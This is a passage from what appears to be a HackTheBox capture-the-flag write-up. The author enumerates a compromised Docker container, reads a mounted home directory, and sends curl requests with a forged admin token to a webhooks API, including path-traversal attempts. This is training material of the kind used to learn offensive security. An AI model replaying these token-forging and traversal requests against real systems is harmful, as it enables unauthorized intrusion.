Docker Container
It was initially suspected to be a Docker container that I gained a foothold to, and later confirmed while performing some basic enumeration
www-data@070370e2cdc4:~/html/public$ pwd
/var/www/html/public
www-data@070370e2cdc4:~/html/public$ ll ..
total 404K
8.0k drwxrwxrwt 1 www-data www-data 4.0k jul 3 04:59 .
4.0k -rw-r--r-- 1 www-data www-data 1.1k jun 30 14:35 .env
8.0k drwxr-xr-x 1 root root 4.0k jun 14 04:37 ..
4.0k -rw-r--r-- 1 www-data www-data 1.8k may 29 21:52 composer.json
4.0k -rw-r--r-- 1 www-data www-data 10 may 29 03:25 .dockerignore
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 24 2023 .git
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 14 2023 public
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 14 2023 resources
284K -rw-r--r-- 1 www-data www-data 282K Jan 6 2023 composer.lock
4.0K drwxr-xr-x 1 www-data www-data 4.0K Jan 6 2023 vendor
4.0K -rw-r--r-- 1 www-data www-data 258 May 5 2022 .editorconfig
4.0K -rw-r--r-- 1 www-data www-data 912 May 5 2022 .env.example
4.0K -rw-r--r-- 1 www-data www-data 152 May 5 2022 .gitattributes
4.0K -rw-r--r-- 1 www-data www-data 179 May 5 2022 .gitignore
4.0K -rw-r--r-- 1 www-data www-data 162 May 5 2022 .styleci.yml
4.0K -rw-r--r-- 1 www-data www-data 3.9K May 5 2022 README.md
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 app
4.0K -rwxr-xr-x 1 www-data www-data 1.7K May 5 2022 artisan
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 bootstrap
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 config
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 database
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 lang
4.0K -rw-r--r-- 1 www-data www-data 473 May 5 2022 package.json
4.0K -rw-r--r-- 1 www-data www-data 1.2K May 5 2022 phpunit.xml
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 routes
8.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 storage
4.0K drwxr-xr-x 1 www-data www-data 4.0K May 5 2022 tests
4.0K -rw-r--r-- 1 www-data www-data 559 May 5 2022 webpack.mix.jsI spawned at the public directory of the web application
www-data@070370e2cdc4:~/html/public$ ll /
total 60K
0 drwxr-xr-x 5 root root 340 aug 22 15:41 dev
0 dr-xr-xr-x 259 root root 0 aug 22 15:41 proc
0 dr-xr-xr-x 13 root root 0 aug 22 15:41 sys
4.0k drwxr-xr-x 5 1000 1000 4.0k aug 3 09:51 mnt
4.0k drwxr-xr-x 1 root root 4.0k jul 3 05:00 .
4.0k drwxr-xr-x 1 root root 4.0k jul 3 05:00 ..
0 -rwxr-xr-x 1 root root 0 jul 3 05:00 .dockerenv
4.0k drwxr-xr-x 1 root root 4.0k jul 3 05:00 etc
4.0k drwxrwxrwt 1 root root 4.0k jul 3 04:59 tmp
4.0k drwxr-xr-x 1 root root 4.0k jul 3 04:58 run
4.0k drwx------ 1 root root 4.0k jun 14 05:52 root
8.0k drwxr-xr-x 1 root root 4.0k jun 14 04:37 var
0 lrwxrwxrwx 1 root root 7 jun 12 00:00 bin -> usr/bin
0 lrwxrwxrwx 1 root root 7 jun 12 00:00 lib -> usr/lib
0 lrwxrwxrwx 1 root root 9 jun 12 00:00 lib32 -> usr/lib32
0 lrwxrwxrwx 1 root root 9 jun 12 00:00 lib64 -> usr/lib64
0 lrwxrwxrwx 1 root root 10 jun 12 00:00 libx32 -> usr/libx32
4.0k drwxr-xr-x 2 root root 4.0k jun 12 00:00 media
4.0k drwxr-xr-x 2 root root 4.0k jun 12 00:00 opt
0 lrwxrwxrwx 1 root root 8 jun 12 00:00 sbin -> usr/sbin
4.0k drwxr-xr-x 2 root root 4.0k jun 12 00:00 srv
4.0k drwxr-xr-x 1 root root 4.0k jun 12 00:00 usr
4.0k drwxr-xr-x 2 root root 4.0k mar 2 13:55 boot
4.0k drwxr-xr-x 2 root root 4.0k mar 2 13:55 homeThere is indeed the .dockerenv file at the system root
/mnt
www-data@070370e2cdc4:/$ cd mnt ; ll
total 40K
4.0K -rw-r----- 1 root 1000 33 Aug 22 15:41 user.txt
4.0K drwxr-xr-x 2 1000 1000 4.0K Aug 3 09:51 .ssh
4.0K drwxrwxrwx 2 root root 4.0K Aug 3 09:51 logs
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug 3 09:51 .
4.0K drwxr-xr-x 3 1000 1000 4.0K Aug 3 09:51 .local
4.0K drwxr-xr-x 1 root root 4.0K Jul 3 05:00 ..
0 lrwxrwxrwx 1 root root 9 Jun 4 02:07 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 701 May 29 23:26 changelog.txt
4.0K -rw-r--r-- 1 1000 1000 220 May 29 15:12 .bash_logout
4.0K -rw-r--r-- 1 1000 1000 3.5K May 29 15:12 .bashrc
4.0K -rw-r--r-- 1 1000 1000 807 May 29 15:12 .profileInterestingly, the home directory of somebody in the host system appears to be mounted to the /mnt directory
changelog.txt
www-data@070370e2cdc4:/mnt$ cat changelog.txt
All notable changes to this project will be documented in this file.
the format is based on [keep a changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [semantic versioning](https://semver.org/spec/v2.0.0.html).
## [Unreleased]
### Added
- Added Home Page
- added [webhook](http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77) (beta) for create registration logs
### Fixed
- Fixed SQLi in Login Page
## [1.1.0] - 2022-12-28
### Added
- Added page to create products.
- Added Welcome Page.
### Changed
- Changelog Theme
## [1.0.0] - 2022-06-20
### Added
- Added Dashboard.
- Added Changelog Page.
### Removed
- Contact Page.The changelog.txt file has the identical content to what I saw in the /dashboard page of the web app
.ssh
www-data@070370e2cdc4:/mnt$ ll .ssh
total 12K
4.0K drwxr-xr-x 2 1000 1000 4.0K Aug 3 09:51 .
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug 3 09:51 ..
4.0K -rw-r--r-- 1 root root 742 Jun 30 15:50 authorized_keys
www-data@070370e2cdc4:/mnt$ cat .ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCy9ETY9f4YGlxIufnXgnIZGcV4pdk94RHW9DExKFNo7iEvAnjMFnyqzGOJQZ623wqvm2WS577WlLFYTGVe4gVkV2LJm8NISndp9DG9l1y62o1qpXkIkYCsP0p87zcQ5MPiXhhVmBR3XsOd9MqtZ6uqRiALj00qGDAc+hlfeSRFo3epHrcwVxAd41vCU8uQiAtJYpFe5l6xw1VGtaLmDeyektJ7QM0ayUHi0dlxcD8rLX+Btnq/xzuoRzXOpxfJEMm93g+tk3sagCkkfYgUEHp6YimLUqgDNNjIcgEpnoefR2XZ8EuLU+G/4aSNgd03+q0gqsnrzX3Syc5eWYyC4wZ93f++EePHoPkObppZS597JiWMgQYqxylmNgNqxu/1mPrdjterYjQ26PmjJlfex6/BaJWTKvJeHAemqi57VkcwCkBA9gRkHi9SLVhFlqJnesFBcgrgLDeG7lzLMseHHGjtb113KB0NXm49rEJKe6ML6exDucGHyHZKV9zgzN9uY4ntp2T86uTFWSq4U2VqLYgg6YjEFsthqDTYLtzHer/8smFqF6gbhsj7cudrWap/Dm88DDa3RW3NBvqwHS6E9mJNYlNtjiTXyV2TNo9TEKchSoIncOxocQv0wcrxoxSjJx7lag9F13xUr/h6nzypKr5C8GGU+pCu70MieA8E23lWtw== john@cybermondayThe .ssh directory has the authorized_keys file that contains the public key of the john user
logs
www-data@070370e2cdc4:/mnt$ ll logs
total 8.0K
4.0k drwxrwxrwx 2 root root 4.0k aug 3 09:51 .
4.0k drwxr-xr-x 5 1000 1000 4.0k aug 3 09:51 ..Although it’s empty, this directory is interesting because I can write to the directory according to the permission bit (drwxrwxrwx)
www-data@070370e2cdc4:/mnt$ echo adsfjajsdf > logs/blah.txt
bash: logs/blah.txt: Read-only file systemHowever, I cannot do so likely due to the privilege override from the container configuration
But this reminds me of the recently added content in the changelog.txt file
There was an existing webhook supposedly designed for creating logs
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl http://webhooks-api-beta.cybermonday.htb/webhooks -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE"
{"status":"success","message":[{"id":1,"uuid":"fda96d32-e8c8-4301-8fb3-c821a316cf77","name":"tests","description":"webhook for tests","action":"createLogFile"},{"id":2,"uuid":"8de9df58-7220-4e7a-81d3-d7faa469f157","name":"SSRF","description":"testing","action":"sendRequest"}]} This can be confirmed by sending a GET request to the /webhooks API endpoint
fda96d32-e8c8-4301-8fb3-c821a316cf77 is the uuid of the log webhook
I will try that
webhook
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json" -d '{"action": "dfdf", "url": "http://10.10.14.20","method": "GET"}'
{"status":"error","message":"\"log_name\" not defined"}
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json" -d '{"log_name": "log1", "log": "http://10.10.14.20","method": "GET"}'
{"status":"error","message":"\"log_content\" not defined"}It seems that log_name and log_content are required parameters
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json" -d '{"log_name": "log1", "log_content": "hello world"}'
{"status":"success","message":"Log created"}Log created
www-data@070370e2cdc4:/mnt$ ll logs
total 12K
4.0K drwxrwxrwx 3 root root 4.0K Aug 22 17:31 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:31 tests
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug 3 09:51 ..
www-data@070370e2cdc4:/mnt$ ll logs/tests
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:31 .
4.0K drwxrwxrwx 3 root root 4.0K Aug 22 17:31 ..
4.0K -rw-r--r-- 1 root root 12 Aug 22 17:31 log1-1692725460.log
www-data@070370e2cdc4:/mnt$ cat logs/tests/log1-1692725460.log
hello worldIt generated the logs/tests/ log1-1692725460.log file, which contains the value of the log_content parameter that I placed above
The file names seems to be the value of the log_name parameter with the - character followed by the Unix’s timestamp
The directory seems to be co-responding to the webhook name itself; tests
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json" -d '{"log_name": "../../log2", "log_content": "hello world"}'
{"status":"error","message":"Only letters and numbers are allowed in the \"name\""} I tried the basic path traversal technique, and it didn’t work
The error message, however, seems to indicate that the path traversal technique worked until it reached the parent directory, which is the name parameter
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json" -d '{"name": "../dummyDir", "action": "createLogFile","description": "for testing only"}'
{"status":"error","message":"Only letters, numbers and underscores are allowed in the \"name\"","status_code":400}
┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create -H "x-access-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE" -H "Content-Type: application/json" -d '{"name": "dummyDir", "action": "createLogFile","description": "for testing only"}'
{"status":"success","message":"Done! Send me a request to execute the action, as the event listener is still being developed.","webhook_uuid":"265cd169-f359-4f32-ae3e-1576216033b4"}
www-data@070370e2cdc4:/mnt$ ll logs
total 16K
4.0K drwxrwxrwx 4 root root 4.0K Aug 22 17:52 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:52 dummyDir
4.0K drwxr-xr-x 2 root root 4.0K Aug 22 17:31 tests
4.0K drwxr-xr-x 5 1000 1000 4.0K Aug 3 09:51 ..I also created another webhook for createLogFile
Interesting thing is that the error message is different when I directly place ../ to the name parameter